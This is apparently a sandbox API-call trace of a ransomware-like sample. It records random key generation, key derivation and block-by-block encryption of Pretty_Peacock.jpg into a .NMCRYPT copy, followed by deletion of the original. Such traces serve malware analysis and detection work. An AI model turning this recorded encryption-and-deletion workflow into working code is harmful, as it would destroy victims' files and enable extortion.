[0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.901] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.902] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.902] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.902] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.902] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.902] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.902] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.902] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.902] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.902] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.902] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.902] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.902] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.902] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.902] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0164.902] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0164.902] CryptCreateHash (in: hProv=0x8e33b8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x60d07c | out: phHash=0x60d07c) returned 1 [0164.903] CryptHashData (hHash=0x9ad278, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.903] CryptDeriveKey (in: hProv=0x8e33b8, Algid=0x6610, hBaseData=0x9ad278, dwFlags=0x4, phKey=0x60d080 | out: phKey=0x60d080*=0x9ad738) returned 1 [0164.903] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0164.903] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0164.903] wcslen (_String="\\\\?\\") returned 0x4 [0164.903] CryptDuplicateKey (in: hKey=0x9ad738, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad5b8) returned 1 [0164.903] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Pretty_Peacock.jpg.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pretty_peacock.jpg.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a4 [0164.903] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Pretty_Peacock.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pretty_peacock.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x690 [0164.903] GetFileSizeEx (in: hFile=0x690, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=5115) returned 1 [0164.903] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0164.904] ReadFile (in: hFile=0x690, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.905] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.905] GetLastError () returned 0x0 [0164.905] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.906] ReadFile (in: hFile=0x690, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.906] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.906] GetLastError () returned 0x0 [0164.907] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.907] ReadFile (in: hFile=0x690, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.907] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.907] GetLastError () returned 0x0 [0164.907] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.907] ReadFile (in: hFile=0x690, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.907] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.907] GetLastError () returned 0x0 [0164.907] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.907] ReadFile (in: hFile=0x690, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.907] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.907] GetLastError () returned 0x0 [0164.907] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.907] ReadFile (in: hFile=0x690, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.907] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.907] GetLastError () returned 0x0 [0164.907] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.908] ReadFile (in: hFile=0x690, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.908] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.908] GetLastError () returned 0x0 [0164.908] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.908] ReadFile (in: hFile=0x690, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.908] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.908] GetLastError () returned 0x0 [0164.908] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.908] ReadFile (in: hFile=0x690, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.908] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.908] GetLastError () returned 0x0 [0164.908] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.908] ReadFile (in: hFile=0x690, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.908] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.909] GetLastError () returned 0x0 [0164.909] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.909] ReadFile (in: hFile=0x690, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.909] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.909] GetLastError () returned 0x0 [0164.909] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.909] ReadFile (in: hFile=0x690, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.909] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.909] GetLastError () returned 0x0 [0164.909] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.909] ReadFile (in: hFile=0x690, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.909] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.909] GetLastError () returned 0x0 [0164.909] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.909] ReadFile (in: hFile=0x690, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.909] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.909] GetLastError () returned 0x0 [0164.909] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.909] ReadFile (in: hFile=0x690, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.910] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.910] GetLastError () returned 0x0 [0164.910] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.910] ReadFile (in: hFile=0x690, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.910] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.910] GetLastError () returned 0x0 [0164.910] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.910] ReadFile (in: hFile=0x690, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.910] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.910] GetLastError () returned 0x0 [0164.910] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.910] ReadFile (in: hFile=0x690, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.910] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.910] GetLastError () returned 0x0 [0164.910] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.910] ReadFile (in: hFile=0x690, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.910] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.910] GetLastError () returned 0x0 [0164.910] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.910] ReadFile (in: hFile=0x690, lpBuffer=0x2895990, nNumberOfBytesToRead=0xfb, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0xfb, lpOverlapped=0x0) returned 1 [0164.910] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0xfb, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.910] GetLastError () returned 0x0 [0164.910] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.911] ReadFile (in: hFile=0x690, lpBuffer=0x2895990, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0164.911] WriteFile (in: hFile=0x6a4, lpBuffer=0x2895990*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0164.911] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Pretty_Peacock.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pretty_peacock.jpg")) returned 0x20 [0164.911] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Pretty_Peacock.jpg", dwFileAttributes=0x20) returned 0 [0164.911] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Pretty_Peacock.jpg") returned 1 [0164.912] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Pretty_Peacock.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pretty_peacock.jpg")) returned 0 [0164.912] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Pretty_Peacock.jpg" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Pretty_Peacock.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Pretty_Peacock.jpg" [0164.912] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Pretty_Peacock.jpg" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 1 [0164.912] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF79D.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf79d.tmp")) returned 0xf79d [0164.912] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Pretty_Peacock.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pretty_peacock.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF79D.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf79d.tmp"), dwFlags=0x1) returned 0 [0164.913] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF79D.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf79d.tmp")) returned 1 [0164.913] CryptDestroyKey (hKey=0x9ad5b8) returned 1 [0164.913] wcslen (_String="OK") returned 0x2 [0164.913] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0164.913] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0164.913] CryptDestroyKey (hKey=0x9ad738) returned 1 [0164.913] CryptDestroyHash (hHash=0x9ad278) returned 1 [0164.913] CryptReleaseContext (hProv=0x8e33b8, dwFlags=0x0) returned 1 [0164.913] FindNextFileW (in: hFindFile=0x9ad238, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0164.913] PathMatchSpecW (pszFile="Psychedelic.jpg", pszSpec="*NMCRYPT") returned 0 [0164.913] PathMatchSpecW 